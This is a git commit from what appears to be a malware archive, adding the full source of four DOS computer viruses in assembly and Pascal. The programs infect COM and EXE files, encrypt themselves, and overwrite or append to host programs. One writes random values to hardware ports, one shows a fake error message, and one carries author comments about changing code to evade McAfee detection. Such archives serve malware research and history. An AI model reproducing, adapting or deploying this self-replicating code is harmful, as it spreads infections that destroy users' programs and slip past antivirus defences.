re-organize

push
vxunderground
2022-08-21 04:07:57 -05:00
parent 74dbd37f30
commit 4b9382ddbc
1392 changed files with 607600 additions and 607600 deletions
@@ -0,0 +1,337 @@
; RANDOM.ASM -- Random To all Ports
; Written by The Wz!
virus_type equ 0 ; Appending Virus
is_encrypted equ 1 ; We're encrypted
tsr_virus equ 0 ; We're not TSR
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
db 0E9h,00h,00h ; Near jump (for compatibility)
start: call find_offset ; Like a PUSH IP
find_offset: pop bp ; BP holds old IP
sub bp,offset find_offset ; Adjust for length of host
call encrypt_decrypt ; Decrypt the virus
start_of_code label near
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
int 021h
call search_files ; Find and infect a file
call search_files ; Find and infect another file
xor ah,ah ; BIOS get time function
int 01Ah
test dx,0001h ; Is timer divisible by 2?
jne no_infection ; If not then don't spread
call search_files ; Find and infect a file
no_infection:
xor ah,ah ; BIOS get time function
int 1Ah
xchg dx,ax ; AX holds low word of timer
mov dx,0FFh ; Start with port 255
out_loop: out dx,al ; OUT a value to the port
dec dx ; Do the next port
jne out_loop ; Repeat until DX = 0
com_end: pop dx ; DX holds original DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; Empty out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
search_files proc near
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,64 ; Allocate 64 bytes on stack
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 64] ; SI points to 64-byte buffer
int 021h
mov ah,03Bh ; DOS change directory function
lea dx,[di + root] ; DX points to root directory
int 021h
call traverse ; Start the traversal
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 64] ; DX points to old directory
int 021h
mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
root db "\",0 ; Root directory
search_files endp
traverse proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first function
mov cx,00010000b ; CX holds search attributes
lea dx,[di + all_files] ; DX points to "*.*"
int 021h
jc leave_traverse ; Leave if no files present
check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory?
jne another_dir ; If not, try again
cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."?
je another_dir ;If so, keep going
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 98] ; DX points to new directory
int 021h
call traverse ; Recursively call ourself
pushf ; Save the flags
mov ah,03Bh ; DOS change directory function
lea dx,[di + up_dir] ; DX points to parent directory
int 021h
popf ; Restore the flags
jnc done_searching ; If we infected then exit
another_dir: mov ah,04Fh ; DOS find next function
int 021h
jnc check_dir ; If found check the file
leave_traverse:
lea dx,[di + com_mask] ; DX points to "*.COM"
call find_files ; Try to infect a file
done_searching: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
up_dir db "..",0 ; Parent directory name
all_files db "*.*",0 ; Directories to search for
com_mask db "*.COM",0 ; Mask for all .COM files
traverse endp
find_files proc near
push bp ; Save BP
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer
int 021h
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc done_finding ; Exit if no files found
call infect_file ; Infect the file!
jnc done_finding ; Exit if no error
mov ah,04Fh ; DOS find next file function
jmp short find_a_file ; Try finding another file
done_finding: mov sp,bp ; Restore old stack frame
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_files endp
infect_file proc near
mov ah,02Fh ; DOS get DTA address function
int 021h
mov si,bx ; SI points to the DTA
mov byte ptr [di + set_carry],0 ; Assume we'll fail
cmp word ptr [si + 01Ah],(65279 - (finish - start))
jbe size_ok ; If it's small enough continue
jmp infection_done ; Otherwise exit
size_ok: mov ax,03D00h ; DOS open file function, r/o
lea dx,[si + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; BX holds file handle
mov ah,03Fh ; DOS read from file function
mov cx,3 ; CX holds bytes to read (3)
lea dx,[di + buffer] ; DX points to buffer
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
xchg dx,ax ; Faster than a PUSH AX
mov ah,03Eh ; DOS close file function
int 021h
xchg dx,ax ; Faster than a POP AX
sub ax,finish - start + 3 ; Adjust AX for a valid jump
cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet?
je infection_done ; If equal then exit
mov byte ptr [di + set_carry],1 ; Success -- the file is OK
add ax,finish - start ; Re-adjust to make the jump
mov word ptr [di + new_jump + 1],ax ; Construct jump
mov ax,04301h ; DOS set file attrib. function
xor cx,cx ; Clear all attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
mov ax,03D02h ; DOS open file function, r/w
int 021h
xchg bx,ax ; BX holds file handle
mov ah,040h ; DOS write to file function
mov cx,3 ; CX holds bytes to write (3)
lea dx,[di + new_jump] ; DX points to the jump we made
int 021h
mov ax,04202h ; DOS file seek function, EOF
cwd ; Zero DX _ Zero bytes from end
mov cx,dx ; Zero CX /
int 021h
push si ; Save SI through call
call encrypt_code ; Write an encrypted copy
pop si ; Restore SI
mov ax,05701h ; DOS set file time function
mov cx,[si + 016h] ; CX holds old file time
mov dx,[si + 018h] ; DX holds old file date
int 021h
mov ah,03Eh ; DOS close file function
int 021h
mov ax,04301h ; DOS set file attrib. function
xor ch,ch ; Clear CH for file attribute
mov cl,[si + 015h] ; CX holds file's old attributes
lea dx,[si + 01Eh] ; DX points to victim's name
int 021h
infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed
ret ; Return to caller
set_carry db ? ; Set-carry-on-exit flag
buffer db 090h,0CDh,020h ; Buffer to hold old three bytes
new_jump db 0E9h,?,? ; New jump to virus
infect_file endp
vcl_marker db "[VCL]",0 ; VCL creation marker
encrypt_code proc near
push bp ; Save BP
mov bp,di ; Use BP as pointer to code
lea si,[bp + encrypt_decrypt]; SI points to cipher routine
xor ah,ah ; BIOS get time function
int 01Ah
mov word ptr [si + 9],dx ; Low word of timer is new key
xor byte ptr [si + 1],8 ;
xor byte ptr [si + 8],1 ; Change all SIs to DIs
xor word ptr [si + 11],0101h; (and vice-versa)
lea di,[bp + finish] ; Copy routine into heap
mov cx,finish - encrypt_decrypt - 1 ; All but final RET
push si ; Save SI for later
push cx ; Save CX for later
rep movsb ; Copy the bytes
lea si,[bp + write_stuff] ; SI points to write stuff
mov cx,5 ; CX holds length of write
rep movsb ; Copy the bytes
pop cx ; Restore CX
pop si ; Restore SI
inc cx ; Copy the RET also this time
rep movsb ; Copy the routine again
mov ah,040h ; DOS write to file function
lea dx,[bp + start] ; DX points to virus
lea si,[bp + finish] ; SI points to routine
call si ; Encrypt/write/decrypt
mov di,bp ; DI points to virus again
pop bp ; Restore BP
ret ; Return to caller
write_stuff: mov cx,finish - start ; Length of code
int 021h
encrypt_code endp
end_of_code label near
encrypt_decrypt proc near
lea si,[bp + start_of_code] ; SI points to code to decrypt
mov cx,(end_of_code - start_of_code) / 2 ; CX holds length
xor_loop: db 081h,034h,00h,00h ; XOR a word by the key
inc si ; Do the next word
inc si ;
loop xor_loop ; Loop until we're through
ret ; Return to caller
encrypt_decrypt endp
finish label near
code ends
end main
@@ -0,0 +1,248 @@
.model tiny ; Handy directive
.code ; Virus code segment
org 100h ; COM file starting IP
entry_point: db 0e9h,0,0 ; jmp decrypt
decrypt: ; handles encryption and decryption
mov cx,(offset heap - offset startencrypt)/2 ; iterations
patch_startencrypt:
mov di,offset startencrypt ; start of decryption
decrypt_loop:
db 81h,35h ; xor word ptr [di], xxxx
decrypt_value dw 0 ; initialised at zero for null effect
inc di ; calculate new decryption location
inc di
loop decrypt_loop ; decrypt mo'
startencrypt:
call next ; calculate delta offset
next: pop bp ; bp = IP next
sub bp,offset next ; bp = delta offset
lea si,[bp+save3]
mov di,100h
push di ; For later return
movsw
movsb
mov byte ptr [bp+numinfec],1 ; reset infection counter
mov ah,1Ah ; Set new DTA
lea dx,[bp+newDTA] ; new DTA @ DS:DX
int 21h
mov ah,47h ; Get current directory
mov dl,0 ; Current drive
lea si,[bp+origdir] ; DS:SI->buffer
int 21h
mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
mov ax,3524h ; Get int 24 handler
int 21h ; to ES:BX
mov word ptr [bp+oldint24],bx; Save it
mov word ptr [bp+oldint24+2],es
mov ah,25h ; Set new int 24 handler
lea dx,[bp+offset int24] ; DS:DX->new handler
int 21h
push cs ; Restore ES
pop es ; 'cuz it was changed
dir_scan: ; "dot dot" traversal
lea dx,[bp+com_mask]
mov ah,4eh ; find first file
mov cx,7 ; any attribute
findfirstnext:
int 21h ; DS:DX points to mask
jc done_infections ; No mo files found
mov al,0h ; Open read only
call open
mov ah,3fh ; Read file to buffer
lea dx,[bp+buffer] ; @ DS:DX
mov cx,1Ah ; 1Ah bytes
int 21h
mov ah,3eh ; Close file
int 21h
checkCOM:
mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
cmp ax,2000 ; Is it too small?
jb find_next
cmp ax,65535-(endheap-decrypt) ; Is it too large?
ja find_next
mov bx,word ptr [bp+buffer+1]; get jmp location
add bx,heap-decrypt+3 ; Adjust for virus size
cmp ax,bx
je find_next ; already infected
jmp infect_com
find_next:
mov ah,4fh ; find next file
jmp short findfirstnext
mov ah,3bh ; change directory
lea dx,[bp+dot_dot] ; "cd .."
int 21h
jnc dir_scan ; go back for mo!
done_infections:
jmp activate ; Always activate
exit_virus:
mov ax,2524h ; Restore int 24 handler
lds dx,[bp+offset oldint24] ; to original
int 21h
push cs
pop ds
mov ah,3bh ; change directory
lea dx,[bp+origdir-1] ; original directory
int 21h
mov ah,1ah ; restore DTA to default
mov dx,80h ; DTA in PSP
int 21h
retn ; 100h is on stack
save3 db 0cdh,20h,0 ; First 3 bytes of COM file
activate: ; ******************************
mov ax,04301h ; DOS set file attributes function
xor cx,cx ; File will have no attributes
lea dx,[di + 01Eh] ; DX points to file name
int 021h
mov ax,03D02h ; DOS open file function, r/w
lea dx,[di + 01Eh] ; DX points to file name
int 021h
xchg bx,ax ; Transfer file handle to AX
jmp exit_virus
creator db '[ZEB(C)1992]',0 ; Mass Produced Code Generator
virusname db '[ranger]',0
infect_com: ; ax = filesize
mov cx,3
sub ax,cx
lea si,[bp+offset buffer]
lea di,[bp+offset save3]
movsw
movsb
mov byte ptr [si-3],0e9h
mov word ptr [si-2],ax
add ax,103h
push ax ; needed later
finishinfection:
push cx ; Save # bytes to write
xor cx,cx ; Clear attributes
call attributes ; Set file attributes
mov al,2
call open
mov ah,40h ; Write to file
lea dx,[bp+buffer] ; Write from buffer
pop cx ; cx bytes
int 21h
mov ax,4202h ; Move file pointer
xor cx,cx ; to end of file
cwd ; xor dx,dx
int 21h
get_encrypt_value:
mov ah,2ch ; Get current time
int 21h ; dh=sec,dl=1/100 sec
or dx,dx ; Check if encryption value = 0
jz get_encrypt_value ; Get another if it is
mov [bp+decrypt_value],dx ; Set new encryption value
lea di,[bp+code_store]
mov ax,5355h ; push bp,push bx
stosw
lea si,[bp+decrypt] ; Copy encryption function
mov cx,startencrypt-decrypt ; Bytes to move
push si ; Save for later use
push cx
rep movsb
lea si,[bp+write] ; Copy writing function
mov cx,endwrite-write ; Bytes to move
rep movsb
pop cx
pop si
pop dx ; Entry point of virus
push di
push si
push cx
rep movsb ; Copy decryption function
mov ax,5b5dh ; pop bx,pop bp
stosw
mov al,0c3h ; retn
stosb
add dx,offset startencrypt - offset decrypt ; Calculate new
mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of
call code_store ; decryption
pop cx
pop di
pop si
rep movsb ; Restore decryption function
mov ax,5701h ; Restore creation date/time
mov cx,word ptr [bp+newDTA+16h] ; time
mov dx,word ptr [bp+newDTA+18h] ; date
int 21h
mov ah,3eh ; Close file
int 21h
mov ch,0
mov cl,byte ptr [bp+newDTA+15h] ; Restore original
call attributes ; attributes
dec byte ptr [bp+numinfec] ; One mo infection
jnz mo_infections ; Not enough
jmp done_infections
mo_infections: jmp find_next
open:
mov ah,3dh
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
xchg ax,bx
ret
attributes:
mov ax,4301h ; Set attributes to cx
lea dx,[bp+newDTA+30] ; filename in DTA
int 21h
ret
write:
pop bx ; Restore file handle
pop bp ; Restore relativeness
mov ah,40h ; Write to file
lea dx,[bp+decrypt] ; Concatenate virus
mov cx,heap-decrypt ; # bytes to write
int 21h
push bx
push bp
endwrite:
int24: ; New int 24h (error) handler
mov al,3 ; Fail call
iret ; Return control
com_mask db '*.com',0
dot_dot db '..',0
heap: ; Variables not in code
; The following code is the buffer for the write function
code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
oldint24 dd ? ; Storage for old int 24h handler
backslash db ?
origdir db 64 dup (?) ; Current directory buffer
newDTA db 43 dup (?) ; Temporary DTA
numinfec db ? ; Infections this run
buffer db 1ah dup (?) ; read buffer
endheap: ; End of virus
end entry_point
@@ -0,0 +1,157 @@
{close but not cookie ranmas4A}
USES dos,link,attrib;
CONST vSize=8608;
VAR PATHLIST,
fileLIST: LISTtype;
TempPtr : NodePtr;
current : byte;
count : integer; {debug}
Running : string;
buffer : array[0..vSize] of byte;
header : array[0..$1A] of byte;
F : file;
vID : string[2];
procedure SuckPaths(var lister: listTYPE);
{Get paths from command environmet}
{Split string into seperate paths }
{Include running path in list }
var
ps, s: string;
ind: integer;
begin
s:= GetEnv('PATH');
ind:= pos(';', S);
GetDir(0,PS);
insertNODE(lister,ps);
if ind<0 then while ind< 0 do BEGIN
ps:= copy(S, 1, ind-1);
{debug} if (random(2)=1) then insertNODE(lister,ps);
delete(S,1,ind);
ind:= pos(';', S);
END;
end;
procedure SuckFiles(path: string; var exes:LISTtype);
{find EXE files in path given }
{return linked list }
var Fil :SearchRec;
BEGIN
{current:=0;}
IF path[ length(path) ]<'\' then path:=path+'\';
{change to *.EXE to make live}
findfirst(path+'*.222',anyfile,fil);
while DosError=0 do begin
If (pos('.',fil.name)<1) and not(boolean(fil.attr and directory)) then
begin
inc(count);
if random(20)=5 then begin {debug}
if (fil.size<$ffff) then begin
InsertNode(exes,(path+fil.name));
{ current:=1; }
end;
end; {debug}
end;
if current=1 then dosError:=18
else findnext(fil); {give "no more files" effect to exit}
end;
END;
{::Skeleton Main::}
BEGIN
randomize; count:=0; initLIST (pathLIST);
vID:='FU';
{::Get cur & PATH's dos's environment::}
SuckPaths(pathLIST); {pick about 1 out of 2 paths from the PATH envir}
{::Pick files from paths::}
TempPtr:=pathLIST.first; {pick 1 name max in every path for checking}
While ( TempPtr<nil ) do BEGIN
suckFiles(TempPtr^.info,fileLIST);
TempPtr:= TempPtr^.link;
END;
killList(pathList);
{::get buffer::}
Running:=ParamStr(0); {get name of the file currently running}
Running:=FExpand(Running);
Assign(F,running);
reset(f,1);
seek(f,0);
blockRead(f,buffer[0],vSize);
close(f);
move(vID[1],buffer[$12],2);
TempPtr:=fileLIST.first;
While ( TempPtr<nil ) do BEGIN
Assign(F,TempPtr^.info);
SetfileATTR(TempPtr^.info,'hsra',false);
Reset(f,1);
Blockread(F,header[0],$1A);
IF (Chr(header[$12])<'F') or
(Chr(header[$13])<'U') then BEGIN
TempPtr^.link:=NIL; {stop search}
seek(F,0);
Blockwrite(F,buffer,vSize);
END;
Close(F);
TempPtr:= TempPtr^.link;
END;
killList(fileList);
writeLN('Disk Read Error');
{change to 0 to make live}
repeat until 1=1{0};
END.
LINK.PAS:
unit link;
INTERFACE
Type
NodePtr=^Node;
Node= record
Info: String[40];
Link: NodePtr;
end;
ListType=record
First: NodePtr;
last : NodePtr;
end;
{var
TheList : ListType;
{MemSize : longInt;}
{TempList:NodePtr;}
procedure initList( Var thelist: listType);
Procedure InsertNode( var theLIST: listType; Stuff: string );
procedure KillList(var theLIst: listTYPE);
IMPLEMENTATION
procedure initList( var thelist: listType);
begin
TheLIST.First:=NIL;
TheLIST.last:= NIL;
end;
Procedure InsertNode( var theLIST: listType; Stuff: string );
var
Temp,
TempNode: NodePtr;
begin
Temp:=TheList.first; {borrow start}
New ( TempNode ); {.............}
TempNode^.Info:= Stuff; {make new node}
TempNode^.Link:= nil; {.............}
If ( Temp=nil ) then
begin
TheList.first:=TempNode; {both point at single node}
TheList.last :=TempNode;
end
ELse
begin
TheList.last^.link:=TempNode; {point last NODE to new node}
TheList.last :=TempNode; {point list END to new node}
end;
end;
procedure KillList(var theLIst: listTYPE);
var dummy,
hold: NodePtr;
begin
dummy:=thelist.first;
while dummy<nil do begin
thelist.First:=thelist.first^.link;
dispose(dummy);
dummy:=Thelist.first;
end;
end;
begin
end.
@@ -0,0 +1,340 @@
; VirusName: Raping Betrayals
; Country : Sweden
; Author : The Unforgiven / Immortal Riot
; Date : 15/09/1993
;
;
; This is an mutation of Misery from Immortal Riot.
; I mutated this one, cuz Mcafee scan grabbed it
; within one month after we released it. So, now
; "Misery" is called "Raping Betrayls". Many
; thanks to PCM2 for the original Leprosy virus.
;
; Okey..In this version I just changed the new
; Mcafee "Scan-String", by remarking some calls.
; I also added a day checker, and if the
; virus (or a infected file) is run at the 10:th
; any month, procedure "ellie" will go off..
; Ellie is some sort of heart breaker!..<..hehe..>
;
; It copies itself into other exe/com files on the current
; drive. The file-size will not be changed, cuz it just
; replaces the code in the beginning with itselves. The
; infected files will not work, instead the virus will
; run again. The virus uses dot-dot metod for changing dirs.
;
; There has been many mutations born from Leprosy,
; and here we give you yet another contribution...
;
; McaFee Scan v108 can't find it, neither can S&S Toolkit 6.54
; Havn't tried with TBScan/F-prot, but they will probably
; identify it as "Leprosy".
;
; Regards : The Unforgiven / Immortal Riot
Title Raping Betrayals ; By The Unforgiven / Immortal Riot
cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 664 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
; ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
; Ä-ÄÄÄ--ÄÄ- Encrypt, save, and restore the virus code ÄÄÄ--ÄÄ--Ä-ÄÄ
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
; call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov dx,code_start ; Buffer where code starts in memory
mov cx,virus_size ; Total number of bytes to write
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
; call encrypt_decrypt ; Restore the code as it was
call daycheck ; Call function who check's for day.
ret ; Go back to where you came from
; ÄÄ-ÄÄÄÄ-ÄÄ Encrypt or decrypt the virus code ; ÄÄ-ÄÄÄÄ--ÄÄÄÄÄÄ-Ä
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start
; encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor al,encrypt_val ; En/dis-engage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from
; ÄÄ-ÄÄÄÄÄ---ÄÄÄÄÄ--ÄÄÄ--ÄÄÄ--ÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ----ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
; ÄÄ-ÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄ--ÄÄÄ---ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--Ä-Ä-ÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
virus_code:
; ÄÄ-ÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄ--ÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; "All strings are kept here in the file, and automatically encrypted"
; Okey..Thanks to Cybernetic Mutation Technology(tm), for this, but
; the virus is pretty un-use-less if Mcafee scan catch is so, I
; changed a few calls, and you can have phun with this again...
; ÄÄ-ÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄ-Ä--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
exe_filespec db "*.EXE",0 ; To infect EXE's
com_filespec db "*.COM",0 ; To infect COM's
newdir db "..",0 ; Move up one directory
; ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; Fake_msg is the message that will be printed on the screen, after
; it has infected files (or when a infected file is run).
; ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄ---ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ-Ä
fake_msg db cr,lf,"Program too big to fit in memory$"
virus_msg1 db cr,lf,tab,"Betrayal is a sin, if it comes from another..$"
db " The Unforgiven / Immortal Riot " ; HUmm..that's me..
db " Dedicated to Ellie! - Lurve you! "; Love ya Ellie!
db " Sweden 15/09/93 " ; written..
; ÄÄ-ÄÄÄÄÄÄÄ----ÄÄÄ-ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; Okey..these messages just are just "file-size out-fillers" or something,
; nothing important..so I remarked them, and the virus is a bit smaller...
; also check in prodedure "Exit_virus" for more info about m..
;virus_msg2 db cr,lf,tab," Something was placed here before.. $"
;virus_msg3 db cr,lf,tab," But now, it's all gone, black, sad $"
;virus_msg4 db cr,lf,tab," and empty. Empty places i my mind, $"
;virus_msg5 db cr,lf,tab," heart, life, and soul, yes, it's a sin. $"
; ÄÄ-ÄÄÄÄÄÄÄÄ---ÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attribs
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attribs
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If "yes", find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribs
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Move the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; Try the process on this one
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret ; Returning to base...
; ÄÄ-ÄÄÄÄÄ-ÄÄÄÄÄ-ÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ-Ä--ÄÄÄÄÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; ELLIE:
; mov ah,09h ; Read under
; mov dx,offset virus_msg1 ; for more
; int 21h ; information
;
; Okey..If it's 10:th (any month), the virus will do something with
; your hard-drives (..ellie..) which I finds to be real nasty ! If
; you wanna check if the function day-check works, just un-mark
; the tree lines under the first "ellie". and the virus_msg1
; "Betrayal is a sin, if it comes from another" will be displayed.
; ÄÄ-ÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
; Here is the real "Ellie"..Yeah..that's certainly her!
; ÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
